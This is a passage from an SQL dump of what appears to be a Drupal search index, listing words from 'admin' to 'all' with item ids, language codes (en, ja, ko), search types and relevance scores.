('admin', 133, 'ja', 'node_search', 1),
('admin', 134, 'en', 'node_search', 1),
('admin', 134, 'ja', 'node_search', 1),
('admin', 135, 'en', 'node_search', 1),
('admin', 135, 'ja', 'node_search', 1),
('admin', 136, 'en', 'node_search', 1),
('admin', 136, 'ja', 'node_search', 1),
('admin', 137, 'en', 'node_search', 1),
('admin', 137, 'ja', 'node_search', 1),
('admin', 138, 'en', 'node_search', 1),
('admin', 138, 'ja', 'node_search', 1),
('admin', 139, 'en', 'node_search', 1),
('admin', 139, 'ja', 'node_search', 1),
('admin', 140, 'en', 'node_search', 1),
('admin', 140, 'ja', 'node_search', 1),
('admin', 141, 'en', 'node_search', 1),
('admin', 141, 'ja', 'node_search', 1),
('admin', 142, 'en', 'node_search', 1),
('admin', 142, 'ja', 'node_search', 1),
('admin', 143, 'en', 'node_search', 1),
('admin', 143, 'ja', 'node_search', 1),
('admin', 144, 'en', 'node_search', 1),
('admin', 144, 'ja', 'node_search', 1),
('admin', 145, 'en', 'node_search', 1),
('admin', 145, 'ja', 'node_search', 1),
('admin', 146, 'en', 'node_search', 1),
('admin', 146, 'ja', 'node_search', 1),
('admin', 147, 'en', 'node_search', 1),
('admin', 147, 'ja', 'node_search', 1),
('admin', 148, 'en', 'node_search', 1),
('admin', 148, 'ja', 'node_search', 1),
('admin', 149, 'en', 'node_search', 1),
('admin', 150, 'en', 'node_search', 1),
('admin', 150, 'ja', 'node_search', 1),
('admin', 151, 'en', 'node_search', 1),
('admin', 151, 'ja', 'node_search', 1),
('admin', 152, 'en', 'node_search', 1),
('admin', 152, 'ja', 'node_search', 1),
('admin', 153, 'en', 'node_search', 1),
('admin', 153, 'ja', 'node_search', 1),
('admin', 154, 'en', 'node_search', 1),
('admin', 154, 'ja', 'node_search', 1),
('admin', 155, 'en', 'node_search', 1),
('admin', 155, 'ja', 'node_search', 1),
('admin', 156, 'en', 'node_search', 1),
('admin', 156, 'ja', 'node_search', 1),
('admin', 157, 'en', 'node_search', 1),
('admin', 157, 'ja', 'node_search', 1),
('admin', 160, 'en', 'node_search', 1),
('admin', 160, 'ja', 'node_search', 1),
('admin', 161, 'en', 'node_search', 1),
('admin', 161, 'ja', 'node_search', 1),
('admin', 162, 'en', 'node_search', 1),
('admin', 162, 'ja', 'node_search', 1),
('admin', 163, 'en', 'node_search', 1),
('admin', 163, 'ja', 'node_search', 1),
('admin', 164, 'en', 'node_search', 1),
('admin', 164, 'ja', 'node_search', 1),
('admin', 165, 'en', 'node_search', 1),
('admin', 165, 'ja', 'node_search', 1),
('admin', 166, 'en', 'node_search', 1),
('admin', 166, 'ja', 'node_search', 1),
('admin', 167, 'en', 'node_search', 1),
('admin', 167, 'ja', 'node_search', 1),
('admin', 168, 'en', 'node_search', 1),
('admin', 168, 'ja', 'node_search', 1),
('admin', 169, 'en', 'node_search', 1),
('admin', 169, 'ja', 'node_search', 1),
('admin', 170, 'en', 'node_search', 1),
('admin', 170, 'ja', 'node_search', 1),
('admin', 171, 'en', 'node_search', 1),
('admin', 171, 'ja', 'node_search', 1),
('admin', 173, 'en', 'node_search', 1),
('admin', 173, 'ja', 'node_search', 1),
('admin', 174, 'en', 'node_search', 1),
('admin', 174, 'ja', 'node_search', 1),
('admin', 175, 'en', 'node_search', 1),
('admin', 175, 'ja', 'node_search', 1),
('admin', 176, 'en', 'node_search', 1),
('admin', 176, 'ja', 'node_search', 1),
('admin', 177, 'en', 'node_search', 1),
('admin', 177, 'ja', 'node_search', 1),
('admin', 178, 'en', 'node_search', 1),
('admin', 178, 'ja', 'node_search', 1),
('admin', 179, 'en', 'node_search', 1),
('admin', 179, 'ja', 'node_search', 1),
('admin', 180, 'en', 'node_search', 1),
('admin', 180, 'ja', 'node_search', 1),
('admin', 181, 'en', 'node_search', 1),
('admin', 181, 'ja', 'node_search', 1),
('admin', 182, 'en', 'node_search', 1),
('admin', 182, 'ja', 'node_search', 1),
('admin', 183, 'en', 'node_search', 1),
('admin', 183, 'ja', 'node_search', 1),
('admin', 184, 'en', 'node_search', 1),
('admin', 184, 'ja', 'node_search', 1),
('admin', 185, 'en', 'node_search', 1),
('admin', 185, 'ja', 'node_search', 1),
('admin', 186, 'en', 'node_search', 1),
('admin', 186, 'ja', 'node_search', 1),
('admin', 187, 'en', 'node_search', 1),
('admin', 187, 'ja', 'node_search', 1),
('admin', 188, 'en', 'node_search', 1),
('admin', 188, 'ja', 'node_search', 1),
('admin', 189, 'en', 'node_search', 1),
('admin', 189, 'ja', 'node_search', 1),
('admin', 190, 'en', 'node_search', 1),
('admin', 190, 'ja', 'node_search', 1),
('admin', 191, 'en', 'node_search', 1),
('admin', 191, 'ja', 'node_search', 1),
('admin', 192, 'en', 'node_search', 1),
('admin', 192, 'ja', 'node_search', 1),
('admin', 193, 'en', 'node_search', 1),
('admin', 193, 'ja', 'node_search', 1),
('admin', 194, 'en', 'node_search', 1),
('admin', 194, 'ja', 'node_search', 1),
('admin', 195, 'en', 'node_search', 1),
('admin', 195, 'ja', 'node_search', 1),
('admin', 196, 'en', 'node_search', 1),
('admin', 196, 'ja', 'node_search', 1),
('admin', 197, 'en', 'node_search', 1),
('admin', 197, 'ja', 'node_search', 1),
('admin', 198, 'en', 'node_search', 1),
('admin', 198, 'ja', 'node_search', 1),
('admin', 199, 'en', 'node_search', 1),
('admin', 199, 'ja', 'node_search', 1),
('admin', 200, 'ja', 'node_search', 1),
('administer', 7, 'en', 'help_search', 8),
('administer', 7, 'ja', 'help_search', 8),
('administer', 7, 'ko', 'help_search', 8),
('administer', 8, 'en', 'help_search', 4),
('administer', 8, 'ja', 'help_search', 4),
('administer', 8, 'ko', 'help_search', 4),
('administer', 9, 'en', 'help_search', 4),
('administer', 9, 'ja', 'help_search', 4),
('administer', 9, 'ko', 'help_search', 4),
('administer', 10, 'en', 'help_search', 4),
('administer', 10, 'ja', 'help_search', 4),
('administer', 10, 'ko', 'help_search', 4),
('administer', 43, 'en', 'help_search', 0.96498),
('administer', 43, 'ja', 'help_search', 0.96498),
('administer', 43, 'ko', 'help_search', 0.96498),
('administer', 59, 'en', 'help_search', 4),
('administer', 59, 'ja', 'help_search', 4),
('administer', 59, 'ko', 'help_search', 4),
('administer', 60, 'en', 'help_search', 4),
('administer', 60, 'ja', 'help_search', 4),
('administer', 60, 'ko', 'help_search', 4),
('administer', 61, 'en', 'help_search', 4),
('administer', 61, 'ja', 'help_search', 4),
('administer', 61, 'ko', 'help_search', 4),
('administer', 64, 'en', 'help_search', 4),
('administer', 64, 'ja', 'help_search', 4),
('administer', 64, 'ko', 'help_search', 4),
('administer', 69, 'en', 'help_search', 8),
('administer', 69, 'ja', 'help_search', 8),
('administer', 69, 'ko', 'help_search', 8),
('administer', 79, 'en', 'help_search', 8),
('administer', 79, 'ja', 'help_search', 8),
('administer', 79, 'ko', 'help_search', 8),
('administer', 86, 'en', 'help_search', 4),
('administer', 86, 'ja', 'help_search', 4),
('administer', 86, 'ko', 'help_search', 4),
('administer', 89, 'en', 'help_search', 4),
('administer', 89, 'ja', 'help_search', 4),
('administer', 89, 'ko', 'help_search', 4),
('administering', 84, 'en', 'help_search', 1),
('administering', 84, 'ja', 'help_search', 1),
('administering', 84, 'ko', 'help_search', 1),
('administration', 27, 'en', 'node_search', 1),
('administration', 32, 'en', 'help_search', 1),
('administration', 32, 'ja', 'help_search', 1),
('administration', 32, 'ko', 'help_search', 1),
('administration', 56, 'en', 'help_search', 2),
('administration', 56, 'ja', 'help_search', 2),
('administration', 56, 'ko', 'help_search', 2),
('administration', 57, 'en', 'help_search', 1),
('administration', 57, 'ja', 'help_search', 1),
('administration', 57, 'ko', 'help_search', 1),
('administration', 58, 'en', 'help_search', 1),
('administration', 58, 'ja', 'help_search', 1),
('administration', 58, 'ko', 'help_search', 1),
('administration', 59, 'en', 'help_search', 1),
('administration', 59, 'ja', 'help_search', 1),
('administration', 59, 'ko', 'help_search', 1),
('administration', 64, 'en', 'help_search', 1),
('administration', 64, 'ja', 'help_search', 1),
('administration', 64, 'ko', 'help_search', 1),
('administration', 77, 'en', 'help_search', 5),
('administration', 77, 'ja', 'help_search', 5),
('administration', 77, 'ko', 'help_search', 5),
('administration', 78, 'en', 'help_search', 4),
('administration', 78, 'ja', 'help_search', 4),
('administration', 78, 'ko', 'help_search', 4),
('administration', 92, 'en', 'help_search', 1),
('administration', 92, 'ja', 'help_search', 1),
('administration', 92, 'ko', 'help_search', 1),
('administrative', 1, 'en', 'help_search', 1),
('administrative', 1, 'ja', 'help_search', 1),
('administrative', 1, 'ko', 'help_search', 1),
('administrative', 2, 'en', 'help_search', 1),
('administrative', 2, 'ja', 'help_search', 1),
('administrative', 2, 'ko', 'help_search', 1),
('administrative', 3, 'en', 'help_search', 1),
('administrative', 3, 'ja', 'help_search', 1),
('administrative', 3, 'ko', 'help_search', 1),
('administrative', 4, 'en', 'help_search', 1),
('administrative', 4, 'ja', 'help_search', 1),
('administrative', 4, 'ko', 'help_search', 1),
('administrative', 5, 'en', 'help_search', 2),
('administrative', 5, 'ja', 'help_search', 2),
('administrative', 5, 'ko', 'help_search', 2),
('administrative', 8, 'en', 'help_search', 2),
('administrative', 8, 'ja', 'help_search', 2),
('administrative', 8, 'ko', 'help_search', 2),
('administrative', 9, 'en', 'help_search', 1),
('administrative', 9, 'ja', 'help_search', 1),
('administrative', 9, 'ko', 'help_search', 1),
('administrative', 10, 'en', 'help_search', 1),
('administrative', 10, 'ja', 'help_search', 1),
('administrative', 10, 'ko', 'help_search', 1),
('administrative', 12, 'en', 'help_search', 1),
('administrative', 12, 'ja', 'help_search', 1),
('administrative', 12, 'ko', 'help_search', 1),
('administrative', 13, 'en', 'help_search', 1),
('administrative', 13, 'ja', 'help_search', 1),
('administrative', 13, 'ko', 'help_search', 1),
('administrative', 14, 'en', 'help_search', 1),
('administrative', 14, 'ja', 'help_search', 1),
('administrative', 14, 'ko', 'help_search', 1),
('administrative', 15, 'en', 'help_search', 1),
('administrative', 15, 'ja', 'help_search', 1),
('administrative', 15, 'ko', 'help_search', 1),
('administrative', 16, 'en', 'help_search', 1),
('administrative', 16, 'ja', 'help_search', 1),
('administrative', 16, 'ko', 'help_search', 1),
('administrative', 17, 'en', 'help_search', 1),
('administrative', 17, 'ja', 'help_search', 1),
('administrative', 17, 'ko', 'help_search', 1),
('administrative', 18, 'en', 'help_search', 2),
('administrative', 18, 'ja', 'help_search', 2),
('administrative', 18, 'ko', 'help_search', 2),
('administrative', 19, 'en', 'help_search', 1),
('administrative', 19, 'ja', 'help_search', 1),
('administrative', 19, 'ko', 'help_search', 1),
('administrative', 21, 'en', 'help_search', 1),
('administrative', 21, 'ja', 'help_search', 1),
('administrative', 21, 'ko', 'help_search', 1),
('administrative', 22, 'en', 'help_search', 6.9658),
('administrative', 22, 'ja', 'help_search', 6.9658),
('administrative', 22, 'ko', 'help_search', 6.9658),
('administrative', 23, 'en', 'help_search', 1),
('administrative', 23, 'ja', 'help_search', 1),
('administrative', 23, 'ko', 'help_search', 1),
('administrative', 24, 'en', 'help_search', 1),
('administrative', 24, 'ja', 'help_search', 1),
('administrative', 24, 'ko', 'help_search', 1),
('administrative', 25, 'en', 'help_search', 1),
('administrative', 25, 'ja', 'help_search', 1),
('administrative', 26, 'en', 'help_search', 1),
('administrative', 26, 'ja', 'help_search', 1),
('administrative', 26, 'ko', 'help_search', 1),
('administrative', 27, 'en', 'help_search', 1),
('administrative', 27, 'ja', 'help_search', 1),
('administrative', 27, 'ko', 'help_search', 1),
('administrative', 28, 'en', 'help_search', 0.98493),
('administrative', 28, 'ja', 'help_search', 0.98493),
('administrative', 28, 'ko', 'help_search', 0.98493),
('administrative', 30, 'en', 'help_search', 2.53983),
('administrative', 30, 'ja', 'help_search', 2.53983),
('administrative', 30, 'ko', 'help_search', 2.53983),
('administrative', 32, 'en', 'help_search', 1),
('administrative', 32, 'ja', 'help_search', 1),
('administrative', 32, 'ko', 'help_search', 1),
('administrative', 37, 'en', 'help_search', 0.886095),
('administrative', 37, 'ja', 'help_search', 0.886095),
('administrative', 37, 'ko', 'help_search', 0.886095),
('administrative', 42, 'en', 'help_search', 28),
('administrative', 42, 'ja', 'help_search', 28),
('administrative', 42, 'ko', 'help_search', 28),
('administrative', 43, 'en', 'help_search', 91.3775),
('administrative', 43, 'ja', 'help_search', 91.3775),
('administrative', 43, 'ko', 'help_search', 91.3775),
('administrative', 45, 'en', 'help_search', 5),
('administrative', 45, 'ja', 'help_search', 5),
('administrative', 45, 'ko', 'help_search', 5),
('administrative', 46, 'en', 'help_search', 1.97808),
('administrative', 46, 'ja', 'help_search', 1.97808),
('administrative', 46, 'ko', 'help_search', 1.97808),
('administrative', 48, 'en', 'help_search', 1),
('administrative', 48, 'ja', 'help_search', 1),
('administrative', 48, 'ko', 'help_search', 1),
('administrative', 49, 'en', 'help_search', 1),
('administrative', 49, 'ja', 'help_search', 1),
('administrative', 49, 'ko', 'help_search', 1),
('administrative', 50, 'en', 'help_search', 1),
('administrative', 50, 'ja', 'help_search', 1),
('administrative', 50, 'ko', 'help_search', 1),
('administrative', 51, 'en', 'help_search', 1),
('administrative', 51, 'ja', 'help_search', 1),
('administrative', 51, 'ko', 'help_search', 1),
('administrative', 52, 'en', 'help_search', 1),
('administrative', 52, 'ja', 'help_search', 1),
('administrative', 52, 'ko', 'help_search', 1),
('administrative', 53, 'en', 'help_search', 2),
('administrative', 53, 'ja', 'help_search', 2),
('administrative', 53, 'ko', 'help_search', 2),
('administrative', 54, 'en', 'help_search', 1),
('administrative', 54, 'ja', 'help_search', 1),
('administrative', 54, 'ko', 'help_search', 1),
('administrative', 55, 'en', 'help_search', 1),
('administrative', 55, 'ja', 'help_search', 1),
('administrative', 55, 'ko', 'help_search', 1),
('administrative', 57, 'en', 'help_search', 1),
('administrative', 57, 'ja', 'help_search', 1),
('administrative', 57, 'ko', 'help_search', 1),
('administrative', 59, 'en', 'help_search', 1),
('administrative', 59, 'ja', 'help_search', 1),
('administrative', 59, 'ko', 'help_search', 1),
('administrative', 60, 'en', 'help_search', 2),
('administrative', 60, 'ja', 'help_search', 2),
('administrative', 60, 'ko', 'help_search', 2),
('administrative', 61, 'en', 'help_search', 1),
('administrative', 61, 'ja', 'help_search', 1),
('administrative', 61, 'ko', 'help_search', 1),
('administrative', 66, 'en', 'help_search', 1),
('administrative', 66, 'ja', 'help_search', 1),
('administrative', 67, 'en', 'help_search', 1),
('administrative', 67, 'ja', 'help_search', 1),
('administrative', 67, 'ko', 'help_search', 1),
('administrative', 69, 'en', 'help_search', 30.9496),
('administrative', 69, 'ja', 'help_search', 30.9496),
('administrative', 69, 'ko', 'help_search', 30.9496),
('administrative', 70, 'en', 'help_search', 1),
('administrative', 70, 'ja', 'help_search', 1),
('administrative', 70, 'ko', 'help_search', 1),
('administrative', 71, 'en', 'help_search', 3),
('administrative', 71, 'ja', 'help_search', 3),
('administrative', 71, 'ko', 'help_search', 3),
('administrative', 72, 'en', 'help_search', 1.93838),
('administrative', 72, 'ja', 'help_search', 1.93838),
('administrative', 72, 'ko', 'help_search', 1.93838),
('administrative', 73, 'en', 'help_search', 2),
('administrative', 73, 'ja', 'help_search', 2),
('administrative', 73, 'ko', 'help_search', 2),
('administrative', 74, 'en', 'help_search', 1),
('administrative', 74, 'ja', 'help_search', 1),
('administrative', 74, 'ko', 'help_search', 1),
('administrative', 75, 'en', 'help_search', 1),
('administrative', 75, 'ja', 'help_search', 1),
('administrative', 75, 'ko', 'help_search', 1),
('administrative', 76, 'en', 'help_search', 3),
('administrative', 76, 'ja', 'help_search', 3),
('administrative', 76, 'ko', 'help_search', 3),
('administrative', 77, 'en', 'help_search', 5),
('administrative', 77, 'ja', 'help_search', 5),
('administrative', 77, 'ko', 'help_search', 5),
('administrative', 78, 'en', 'help_search', 1),
('administrative', 78, 'ja', 'help_search', 1),
('administrative', 78, 'ko', 'help_search', 1),
('administrative', 79, 'en', 'help_search', 3),
('administrative', 79, 'ja', 'help_search', 3),
('administrative', 79, 'ko', 'help_search', 3),
('administrative', 81, 'en', 'help_search', 30),
('administrative', 81, 'ja', 'help_search', 30),
('administrative', 81, 'ko', 'help_search', 30),
('administrative', 82, 'en', 'help_search', 1),
('administrative', 82, 'ja', 'help_search', 1),
('administrative', 82, 'ko', 'help_search', 1),
('administrative', 83, 'en', 'help_search', 1),
('administrative', 83, 'ja', 'help_search', 1),
('administrative', 83, 'ko', 'help_search', 1),
('administrative', 85, 'en', 'help_search', 1),
('administrative', 85, 'ja', 'help_search', 1),
('administrative', 85, 'ko', 'help_search', 1),
('administrative', 86, 'en', 'help_search', 2),
('administrative', 86, 'ja', 'help_search', 2),
('administrative', 86, 'ko', 'help_search', 2),
('administrative', 87, 'en', 'help_search', 1),
('administrative', 87, 'ja', 'help_search', 1),
('administrative', 87, 'ko', 'help_search', 1),
('administrative', 88, 'en', 'help_search', 2),
('administrative', 88, 'ja', 'help_search', 2),
('administrative', 88, 'ko', 'help_search', 2),
('administrative', 89, 'en', 'help_search', 1),
('administrative', 89, 'ja', 'help_search', 1),
('administrative', 89, 'ko', 'help_search', 1),
('administrative', 90, 'en', 'help_search', 2),
('administrative', 90, 'ja', 'help_search', 2),
('administrative', 90, 'ko', 'help_search', 2),
('administrative', 91, 'en', 'help_search', 1),
('administrative', 91, 'ja', 'help_search', 1),
('administrative', 91, 'ko', 'help_search', 1),
('administrative', 92, 'en', 'help_search', 1),
('administrative', 92, 'ja', 'help_search', 1),
('administrative', 92, 'ko', 'help_search', 1),
('administrative', 93, 'en', 'help_search', 1.63414),
('administrative', 93, 'ja', 'help_search', 1.63414),
('administrative', 93, 'ko', 'help_search', 1.63414),
('administrator', 30, 'en', 'help_search', 1),
('administrator', 30, 'ja', 'help_search', 1),
('administrator', 30, 'ko', 'help_search', 1),
('administrator', 31, 'ja', 'help_search', 0.993146),
('administrator', 69, 'en', 'help_search', 1),
('administrator', 69, 'ja', 'help_search', 1),
('administrator', 69, 'ko', 'help_search', 1),
('administrators', 4, 'en', 'help_search', 1),
('administrators', 4, 'ja', 'help_search', 1),
('administrators', 4, 'ko', 'help_search', 1),
('administrators', 8, 'en', 'help_search', 1),
('administrators', 8, 'ja', 'help_search', 1),
('administrators', 8, 'ko', 'help_search', 1),
('administrators', 10, 'en', 'help_search', 1),
('administrators', 10, 'ja', 'help_search', 1),
('administrators', 10, 'ko', 'help_search', 1),
('administrators', 20, 'en', 'help_search', 1),
('administrators', 20, 'ja', 'help_search', 1),
('administrators', 20, 'ko', 'help_search', 1),
('administrators', 28, 'en', 'help_search', 2),
('administrators', 28, 'ja', 'help_search', 2),
('administrators', 28, 'ko', 'help_search', 2),
('administrators', 30, 'en', 'help_search', 1),
('administrators', 30, 'ja', 'help_search', 1),
('administrators', 30, 'ko', 'help_search', 1),
('administrators', 36, 'en', 'help_search', 1),
('administrators', 36, 'ja', 'help_search', 1),
('administrators', 36, 'ko', 'help_search', 1),
('administrators', 60, 'en', 'help_search', 1),
('administrators', 60, 'ja', 'help_search', 1),
('administrators', 60, 'ko', 'help_search', 1),
('administrators', 84, 'en', 'help_search', 2),
('administrators', 84, 'ja', 'help_search', 2),
('administrators', 84, 'ko', 'help_search', 2),
('administrators', 86, 'en', 'help_search', 1),
('administrators', 86, 'ja', 'help_search', 1),
('administrators', 86, 'ko', 'help_search', 1),
('admiration', 122, 'en', 'node_search', 1),
('adults', 87, 'en', 'node_search', 1),
('advance', 81, 'en', 'help_search', 1),
('advance', 81, 'ja', 'help_search', 1),
('advance', 81, 'ko', 'help_search', 1),
('advance', 182, 'en', 'node_search', 1),
('advanced', 23, 'en', 'node_search', 0.854391),
('advanced', 68, 'en', 'help_search', 3.59781),
('advanced', 68, 'ja', 'help_search', 3.59781),
('advanced', 68, 'ko', 'help_search', 3.59781),
('advanced', 93, 'en', 'help_search', 10.801),
('advanced', 93, 'ja', 'help_search', 10.801),
('advanced', 93, 'ko', 'help_search', 10.801),
('advances', 185, 'en', 'node_search', 27),
('advantage', 24, 'en', 'node_search', 0.774192),
('adventure', 66, 'en', 'node_search', 0.916736),
('advice', 120, 'en', 'node_search', 1),
('advisories', 38, 'en', 'help_search', 20),
('advisories', 38, 'ja', 'help_search', 20),
('advisories', 38, 'ko', 'help_search', 20),
('advisory', 38, 'en', 'help_search', 14),
('advisory', 38, 'ja', 'help_search', 14),
('advisory', 38, 'ko', 'help_search', 14),
('affected', 22, 'en', 'help_search', 1),
('affected', 22, 'ja', 'help_search', 1),
('affected', 22, 'ko', 'help_search', 1),
('affiliated', 142, 'en', 'node_search', 1),
('affordable', 27, 'en', 'node_search', 1),
('after', 3, 'en', 'node_search', 2),
('after', 3, 'ko', 'node_search', 2),
('after', 5, 'en', 'node_search', 1),
('after', 5, 'ko', 'node_search', 1),
('after', 8, 'en', 'node_search', 2),
('after', 25, 'ja', 'help_search', 1),
('after', 26, 'en', 'help_search', 1),
('after', 26, 'ja', 'help_search', 1),
('after', 26, 'ko', 'help_search', 1),
('after', 28, 'en', 'help_search', 0.810915),
('after', 28, 'ja', 'help_search', 0.810915),
('after', 28, 'ko', 'help_search', 0.810915),
('after', 30, 'en', 'help_search', 0.766757),
('after', 30, 'ja', 'help_search', 0.766757),
('after', 30, 'ko', 'help_search', 0.766757),
('after', 31, 'en', 'node_search', 1.88282),
('after', 37, 'en', 'help_search', 1),
('after', 37, 'ja', 'help_search', 1),
('after', 37, 'ko', 'help_search', 1),
('after', 48, 'en', 'help_search', 1),
('after', 48, 'ja', 'help_search', 1),
('after', 48, 'ko', 'help_search', 1),
('after', 67, 'en', 'help_search', 0.906287),
('after', 67, 'ja', 'help_search', 0.906287),
('after', 67, 'ko', 'help_search', 0.906287),
('after', 68, 'en', 'help_search', 1),
('after', 68, 'ja', 'help_search', 1),
('after', 68, 'ko', 'help_search', 1),
('after', 72, 'en', 'help_search', 0.997306),
('after', 72, 'ja', 'help_search', 0.997306),
('after', 72, 'ko', 'help_search', 0.997306),
('after', 93, 'en', 'help_search', 1),
('after', 93, 'ja', 'help_search', 1),
('after', 93, 'ko', 'help_search', 1),
('after', 165, 'en', 'node_search', 1),
('after', 169, 'en', 'node_search', 1),
('after', 173, 'en', 'node_search', 1),
('after', 174, 'en', 'node_search', 1),
('after', 181, 'en', 'node_search', 1),
('after', 182, 'en', 'node_search', 4),
('after', 183, 'en', 'node_search', 5),
('after', 184, 'en', 'node_search', 27),
('afternoon', 4, 'en', 'node_search', 1),
('afternoon', 4, 'ja', 'node_search', 1),
('afterwards', 37, 'en', 'help_search', 0.913226),
('afterwards', 37, 'ja', 'help_search', 0.913226),
('afterwards', 37, 'ko', 'help_search', 0.913226),
('afterwards', 92, 'en', 'help_search', 1),
('afterwards', 92, 'ja', 'help_search', 1),
('afterwards', 92, 'ko', 'help_search', 1),
('again', 22, 'en', 'help_search', 1),
('again', 22, 'ja', 'help_search', 1),
('again', 22, 'ko', 'help_search', 1),
('again', 61, 'en', 'help_search', 1),
('again', 61, 'ja', 'help_search', 1),
('again', 61, 'ko', 'help_search', 1),
('again', 70, 'en', 'help_search', 1),
('again', 70, 'ja', 'help_search', 1),
('again', 70, 'ko', 'help_search', 1),
('against', 28, 'en', 'help_search', 1),
('against', 28, 'ja', 'help_search', 1),
('against', 28, 'ko', 'help_search', 1),
('against', 44, 'en', 'help_search', 1),
('against', 44, 'ja', 'help_search', 1),
('against', 44, 'ko', 'help_search', 1),
('aged', 5, 'en', 'node_search', 1),
('aged', 5, 'ko', 'node_search', 1),
('agency', 1, 'en', 'node_search', 17),
('agency', 1, 'ja', 'node_search', 26),
('agency', 1, 'ko', 'node_search', 17),
('agency', 4, 'en', 'node_search', 1),
('agency', 4, 'ja', 'node_search', 1),
('agency', 4, 'ko', 'node_search', 1),
('agency', 5, 'en', 'node_search', 1),
('agency', 5, 'ja', 'node_search', 0.725015),
('agency', 5, 'ko', 'node_search', 1),
('agency', 9, 'en', 'node_search', 28),
('agency', 9, 'ko', 'node_search', 28),
('agency', 10, 'en', 'node_search', 1),
('agency', 10, 'ja', 'node_search', 1),
('agency', 10, 'ko', 'node_search', 1),
('agency', 11, 'en', 'node_search', 16),
('agency', 17, 'en', 'node_search', 30),
('agency', 17, 'ko', 'node_search', 30),
('agency', 18, 'en', 'node_search', 1),
('agency', 18, 'ja', 'node_search', 0.882818),
('agency', 18, 'ko', 'node_search', 1),
('agency', 19, 'en', 'node_search', 1),
('agency', 19, 'ko', 'node_search', 1),
('agency', 23, 'en', 'node_search', 4.65304),
('agency', 23, 'ko', 'node_search', 1.78178),
('agency', 24, 'en', 'node_search', 0.819249),
('agency', 24, 'ko', 'node_search', 1.81645),
('agency', 27, 'en', 'node_search', 1),
('agency', 28, 'en', 'node_search', 3),
('agency', 28, 'ja', 'node_search', 28),
('agency', 28, 'ko', 'node_search', 28),
('agency', 29, 'en', 'node_search', 28),
('agency', 29, 'ja', 'node_search', 28),
('agency', 29, 'ko', 'node_search', 28),
('agency', 30, 'en', 'node_search', 1),
('agency', 30, 'ja', 'node_search', 0.833529),
('agency', 30, 'ko', 'node_search', 1),
('agency', 62, 'en', 'node_search', 1),
('agency', 62, 'ja', 'node_search', 0.786915),
('agency', 66, 'en', 'node_search', 1),
('agency', 67, 'ja', 'node_search', 1),
('agency', 69, 'en', 'node_search', 2),
('agency', 69, 'ja', 'node_search', 1.91323),
('agency', 135, 'en', 'node_search', 3),
('agency', 136, 'en', 'node_search', 2),
('agency', 138, 'en', 'node_search', 1),
('agency', 142, 'en', 'node_search', 1),
('agency', 154, 'en', 'node_search', 2),
('agency', 156, 'en', 'node_search', 2),
('agency', 156, 'ja', 'node_search', 1),
('agency', 157, 'en', 'node_search', 3),
('agency', 157, 'ja', 'node_search', 1),
('agency', 160, 'en', 'node_search', 2),
('agency', 161, 'en', 'node_search', 2),
('agency', 162, 'en', 'node_search', 1.86366),
('agency', 164, 'en', 'node_search', 2),
('agency', 165, 'en', 'node_search', 2),
('agency', 166, 'en', 'node_search', 1),
('agency', 167, 'en', 'node_search', 2),
('agency', 168, 'en', 'node_search', 1),
('agency', 169, 'en', 'node_search', 1),
('agency', 170, 'en', 'node_search', 1),
('agency', 171, 'en', 'node_search', 1),
('agency', 173, 'en', 'node_search', 2),
('agency', 174, 'en', 'node_search', 2),
('agency', 175, 'en', 'node_search', 2),
('agency', 176, 'en', 'node_search', 1),
('agency', 177, 'en', 'node_search', 1),
('agency', 178, 'en', 'node_search', 1),
('agency', 179, 'en', 'node_search', 2),
('agency', 180, 'en', 'node_search', 1),
('agency', 184, 'en', 'node_search', 1),
('agency', 185, 'en', 'node_search', 1),
('agency', 186, 'en', 'node_search', 1),
('agency', 187, 'en', 'node_search', 1),
('agency', 188, 'en', 'node_search', 1),
('agency', 189, 'en', 'node_search', 1),
('agency', 190, 'en', 'node_search', 1),
('agency', 191, 'en', 'node_search', 1),
('agency', 192, 'en', 'node_search', 1),
('agency', 193, 'en', 'node_search', 1),
('agency', 194, 'en', 'node_search', 1),
('agency', 195, 'en', 'node_search', 1),
('agency', 196, 'en', 'node_search', 1),
('agency', 197, 'en', 'node_search', 1),
('agency', 198, 'en', 'node_search', 1),
('agency', 199, 'en', 'node_search', 1),
('aggregation', 37, 'en', 'help_search', 20.8513),
('aggregation', 37, 'ja', 'help_search', 20.8513),
('aggregation', 37, 'ko', 'help_search', 20.8513),
('agricultural', 24, 'en', 'node_search', 0.920273),
('agricultural', 163, 'en', 'node_search', 4.93105),
('agriculture', 163, 'en', 'node_search', 32),
('ahead', 161, 'en', 'node_search', 1),
('ahead', 169, 'en', 'node_search', 1),
('ahead', 180, 'en', 'node_search', 1),
('ahead', 187, 'en', 'node_search', 1),
('aichi', 162, 'en', 'node_search', 29),
('aim', 25, 'en', 'node_search', 1),
('aim', 26, 'en', 'node_search', 1),
('akita', 69, 'en', 'node_search', 1),
('akita', 137, 'en', 'node_search', 1),
('akita', 139, 'en', 'node_search', 1),
('akita', 141, 'en', 'node_search', 1),
('akita', 150, 'en', 'node_search', 1),
('alias', 63, 'en', 'help_search', 35),
('alias', 63, 'ja', 'help_search', 35),
('alias', 63, 'ko', 'help_search', 35),
('alias', 64, 'en', 'help_search', 30),
('alias', 64, 'ja', 'help_search', 30),
('alias', 64, 'ko', 'help_search', 30),
('alias', 65, 'en', 'help_search', 20),
('alias', 65, 'ja', 'help_search', 20),
('alias', 65, 'ko', 'help_search', 20),
('alias', 86, 'en', 'help_search', 1),
('alias', 86, 'ja', 'help_search', 1),
('alias', 86, 'ko', 'help_search', 1),
('aliases', 63, 'en', 'help_search', 26),
('aliases', 63, 'ja', 'help_search', 26),
('aliases', 63, 'ko', 'help_search', 26),
('aliases', 64, 'en', 'help_search', 32),
('aliases', 64, 'ja', 'help_search', 32),
('aliases', 64, 'ko', 'help_search', 32),
('aliases', 65, 'en', 'help_search', 61),
('aliases', 65, 'ja', 'help_search', 61),
('aliases', 65, 'ko', 'help_search', 61),
('aliasing', 65, 'en', 'help_search', 1),
('aliasing', 65, 'ja', 'help_search', 1),
('aliasing', 65, 'ko', 'help_search', 1),
('all', 1, 'en', 'help_search', 1),
('all', 1, 'ja', 'help_search', 1),
('all', 1, 'ko', 'help_search', 1),
('all', 9, 'en', 'help_search', 1),
('all', 9, 'ja', 'help_search', 1),
('all', 9, 'ko', 'help_search', 1),
('all', 10, 'en', 'help_search', 1),
('all', 10, 'ja', 'help_search', 1),
('all', 10, 'ko', 'help_search', 1),
('all', 12, 'en', 'help_search', 1),
('all', 12, 'ja', 'help_search', 1),
('all', 12, 'ko', 'help_search', 1),
('all', 14, 'en', 'help_search', 4),
('all', 14, 'ja', 'help_search', 4),
('all', 14, 'ko', 'help_search', 4),
('all', 22, 'en', 'help_search', 1),
